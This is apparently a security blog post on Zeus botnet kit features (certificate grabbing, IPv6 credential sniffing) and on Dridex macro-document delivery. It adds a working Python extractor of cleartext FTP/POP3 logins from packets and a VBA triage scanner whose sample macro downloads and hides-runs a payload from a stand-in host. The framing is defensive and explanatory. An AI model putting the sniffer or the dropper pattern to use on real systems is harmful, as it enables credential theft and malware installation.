Wednesday, April 27, 2016

Botnet Feature Advancement Zeus !

When you’re building your very own botnet you need to be quite selective about the botnet agent you’re planning on running with. Many of the botnets we encounter operating within enterprise environments today are constructed using commonly available DIY malware construction kits – of which Zeus is the most popular.
Zeus is an interesting DIY malware construction kit. Over the years it has added to its versatility and developed into an open platform for third-party tool integration, depending upon the type of fraud or cybercrime the botnet master is most interested in. Along the way, many malware developers have tweaked the Zeus kit and offer specialized (and competing) major versions of the DIY suite for sale. As such, the “Zeus” kit has morphed and isn’t really even a single kit any more. You can find Zeus construction kits retailing between $400-$700 for the latest versions, dropping to “free” within a couple of months as pirated versions start circulating on torrent sites.
That said, competition between Zeus vendors is fierce, driving new innovation within this single DIY construction kit.
Take for example the recently posted “for sale” listing for a new Zeus version over on one of the popular hacking forums, retailing for $700 new…
[Image: Zeus1300]
It’s interesting to note the major changes in the DIY kit’s changelog (translated from the original posting):
[Version 1.3.0.0, 20.11.2009]
[*] WinAPI interception by splicing.
[+] Full operation under Windows Vista / 7.
[*] Temporarily disabled hiding of the Trojan’s files.
[*] Removed TAN-grabber.
[-] Fixed duplicate records in nspr4.dll.
[*] Grabbed certificates are now written under the name grabbed_dd_mm_yyy.pfx, with the password in UTF-8.
[*] The getcerts command now obtains certificates only from the MY store, not from all stores, since obtaining certificates from all stores makes no sense.
[*] Changed the behavior of the certificate grabber.
[*] Rewrote the FTP/POP3 sniffer, improved login detection, added support for IPv6 addresses.
[*] Rewrote keyboard input interception, fixed handling of international characters.
[-] Fixed a bug in HTTP fakes that could lead to a deadlock.
I think the most interesting advances are those I’ve bolded above.
Obviously Windows 7 support is going to be pretty important going forward for Zeus-dependent botnet masters; so too is the grabbing of certificates from victims’ systems (e.g. SSL/TLS client certificates used for corporate VPN access). The fact that the TAN-grabber has been removed is probably more indicative of a feature no longer required by Zeus “customers”, and of an effort to keep the Zeus botnet agent small.
The most significant addition in this release, in my mind, is the added support for IPv6, particularly as it relates to network sniffing. As enterprise (and government) networks take up IPv6 internally, botnet operators need to ensure that they are also “IPv6 compliant” (easy enough if the victim’s operating system already handles IPv6 for them), but more critical is the capability to sniff IPv6 network traffic and automatically extract the data most valuable to the botnet operator (here, FTP and POP3 logins) rather than having to deal with bulk packet captures.
For those enterprise networks already running IPv6 it’s important that their network administrators and security teams know that botnet masters are already armed with IPv6 capabilities – and are constantly tweaking and enhancing botnet agent capabilities.
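To show what the rewritten sniffer is after, from the defender’s side, here is an added example (not code from the original post and not Zeus code): a small Python extractor that pulls FTP and POP3 USER/PASS pairs out of raw IPv4 and IPv6 packets. The point is that cleartext logins are exactly as easy to harvest once a host speaks IPv6, so a network that still allows plain FTP or POP3 internally has the same exposure on both address families. The packets are constructed inline for the demonstration; the parser assumes no IPv6 extension headers and does nothing more than in-order concatenation of each client-to-server stream.

```python
"""Pull cleartext FTP/POP3 logins out of raw IPv4 and IPv6 packets (added example)."""
import socket
import struct

TCP = 6
CRED_PORTS = {21: "FTP", 110: "POP3"}


def parse_packet(pkt: bytes):
    """Return (src, dst, dport, tcp_payload) for a TCP packet, else None.

    Assumption: IPv6 packets carry no extension headers, so the next-header
    byte at offset 6 is the transport protocol.
    """
    version = pkt[0] >> 4
    if version == 4:
        ihl = (pkt[0] & 0x0F) * 4
        proto = pkt[9]
        src = socket.inet_ntop(socket.AF_INET, pkt[12:16])
        dst = socket.inet_ntop(socket.AF_INET, pkt[16:20])
        l4 = pkt[ihl:]
    elif version == 6:
        proto = pkt[6]
        src = socket.inet_ntop(socket.AF_INET6, pkt[8:24])
        dst = socket.inet_ntop(socket.AF_INET6, pkt[24:40])
        l4 = pkt[40:]
    else:
        return None
    if proto != TCP:
        return None
    _sport, dport = struct.unpack("!HH", l4[:4])
    data_off = (l4[12] >> 4) * 4  # TCP header length, options included
    return src, dst, dport, l4[data_off:]


def extract_credentials(packets):
    """Concatenate each client->server stream and report USER/PASS pairs."""
    streams = {}
    for pkt in packets:
        parsed = parse_packet(pkt)
        if parsed is None:
            continue
        src, dst, dport, payload = parsed
        if dport not in CRED_PORTS:
            continue
        streams.setdefault((src, dst, dport), bytearray()).extend(payload)
    creds = []
    for (src, dst, dport), data in streams.items():
        user = password = None
        for line in data.decode("ascii", "replace").splitlines():
            cmd, _, arg = line.strip().partition(" ")
            if cmd.upper() == "USER":
                user = arg
            elif cmd.upper() == "PASS":
                password = arg
            if user is not None and password is not None:
                creds.append({"proto": CRED_PORTS[dport], "src": src, "dst": dst,
                              "user": user, "password": password})
                user = password = None
    return creds


def build_packet(src, dst, dport, payload, v6=False):
    """Constructed test frame: minimal IP header + 20-byte TCP header, no options, no checksums."""
    tcp = struct.pack("!HHIIBBHHH", 49152, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    if v6:
        ip = (struct.pack("!IHBB", 6 << 28, len(tcp), TCP, 64)
              + socket.inet_pton(socket.AF_INET6, src) + socket.inet_pton(socket.AF_INET6, dst))
    else:
        ip = (struct.pack("!BBHHHBBH", 0x45, 0, 20 + len(tcp), 0, 0, 64, TCP, 0)
              + socket.inet_pton(socket.AF_INET, src) + socket.inet_pton(socket.AF_INET, dst))
    return ip + tcp


# Constructed sample capture: an FTP login over IPv6 split across two segments,
# an unrelated HTTPS segment that must be ignored, and a POP3 login over IPv4.
SAMPLE_PACKETS = [
    build_packet("2001:db8::10", "2001:db8::21", 21, b"USER alice\r\n", v6=True),
    build_packet("192.0.2.10", "198.51.100.5", 443, b"\x16\x03\x01\x00\x05hello"),
    build_packet("2001:db8::10", "2001:db8::21", 21, b"PASS s3cret\r\n", v6=True),
    build_packet("192.0.2.10", "198.51.100.7", 110, b"USER bob\r\nPASS hunter2\r\n"),
]

if __name__ == "__main__":
    for c in extract_credentials(SAMPLE_PACKETS):
        print(f"{c['proto']} {c['src']} -> {c['dst']}: {c['user']} / {c['password']}")
```

Run against a real capture you would feed it the IP layer of each frame (strip the Ethernet header first) and add proper TCP reassembly; the useful check for an enterprise team is simply whether this finds anything at all on a span port, on either address family.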
One last thing to note though. Just because Zeus is a common botnet malware family, it doesn’t mean that you’re likely to have antivirus detection coverage within typical enterprise networks. Zeus is practically never deployed in its “raw” state; instead, botnet masters typically deploy heavily obfuscated and protected serial variants of the malware, making each victim’s sample unique. So don’t be surprised if it evades the host-based detection technologies you have deployed.

Latest Dridex Banking Trojan? How it Works?

Dridex malware – also known as Bugat and Cridex – is believed to have been created by cyber criminals in Eastern Europe in an effort to harvest online banking details. Even after a high-profile takedown operation in late 2015, the Dridex botnet seems to be active again.

Dridex is typically distributed through spam emails carrying malicious attachments, most often a Microsoft Office document (usually Word) embedding malicious macros.

Once the document is opened and macros are enabled, the macro code downloads the main payload, the trojan itself, from a compromised server, and installs and runs it on the victim’s computer.

The Dridex trojan then installs a keylogger on the infected machine and manipulates banking websites with the help of transparent redirects and web-injects.

This results in the theft of the victim’s personal data, such as usernames and passwords, with the ultimate aim of breaking into bank accounts and siphoning off cash.
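The infection chain described above (macro-laden document, download of a second stage, execution) is what a first-pass triage script looks for in an attachment. The following Python is an added example, not Dridex code and not from any source the page cites: a heuristic scanner over VBA source text that flags the auto-execute entry point, download primitives, process execution and string obfuscation, and extracts hard-coded URLs. The macro sample is constructed for illustration, and the regexes, field names and verdict strings are this example’s own; in practice you would feed it the VBA extracted from the document (for instance with olevba from oletools) rather than a literal string.

```python
"""Heuristic triage of VBA macro source for a download-and-execute chain (added example)."""
import re

# Entry points the Office host runs without user interaction once macros are enabled.
AUTO_EXEC = re.compile(r"\b(AutoOpen|Document_Open|Workbook_Open|AutoExec|Auto_Open)\b", re.I)
# Ways VBA commonly fetches a second stage.
DOWNLOAD = re.compile(r"(URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)", re.I)
# Ways VBA commonly launches what it fetched.
EXECUTE = re.compile(r"\b(WScript\.Shell|ShellExecute|Shell)\b", re.I)
# String-building tricks used to hide the above from simple signature scans.
OBFUSCATION = re.compile(r"\b(Chr\(|ChrW\(|StrReverse\(|Replace\()", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)


def triage_macro(vba: str) -> dict:
    """Return the matched indicators plus a verdict for one macro's source text."""
    result = {
        "auto_exec": sorted({m.group(0) for m in AUTO_EXEC.finditer(vba)}),
        "download": sorted({m.group(0) for m in DOWNLOAD.finditer(vba)}),
        "execute": sorted({m.group(0) for m in EXECUTE.finditer(vba)}),
        "obfuscation": sorted({m.group(0) for m in OBFUSCATION.finditer(vba)}),
        "urls": URL.findall(vba),
    }
    # The full chain (runs on open, fetches something, launches it) is the Dridex pattern;
    # a download or execute primitive on its own still deserves an analyst's look.
    if result["auto_exec"] and result["download"] and result["execute"]:
        result["verdict"] = "download-and-execute chain"
    elif result["download"] or result["execute"]:
        result["verdict"] = "review"
    else:
        result["verdict"] = "benign-looking"
    return result


# Constructed sample: the shape of a macro dropper, with a reserved test domain.
SAMPLE_MACRO = r'''
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim p As String
    p = Environ("TEMP") & "\" & StrReverse("exe.etadpu")
    URLDownloadToFile 0, "http://example.invalid/stage2.bin", p, 0, 0
    Shell p, vbHide
End Sub
'''

# Constructed sample: an ordinary formatting macro, for comparison.
BENIGN_MACRO = '''
Sub FormatReport()
    ActiveSheet.Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, triage_macro(src))
```

Heavily obfuscated droppers will defeat the download and execute patterns by assembling those names at runtime, which is why the obfuscation indicators are reported separately: an AutoOpen routine whose body is nothing but Chr() and StrReverse() calls is itself a reason to detonate the file in a sandbox.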

Hacker replaces Trojan with Anti-virus


However, a recent hack surprised everyone: instead of distributing the banking trojan, a portion of the Dridex botnet currently seems to be spreading legitimate copies of Avira’s free anti-virus software, as the company itself has announced.

"The content behind the malware download [link] has been replaced, it is now providing [a legitimate], up-to-date Avira web installer instead of the usual Dridex loader."
Avira believes that a white hat hacker or hackers may have broken into a portion of the compromised web servers using the same flaws the malware authors used, and then replaced the malicious payload with the Avira installer.

So, once the macro runs, instead of receiving the Dridex loader, the victims get a valid, signed copy of the Avira antivirus installer.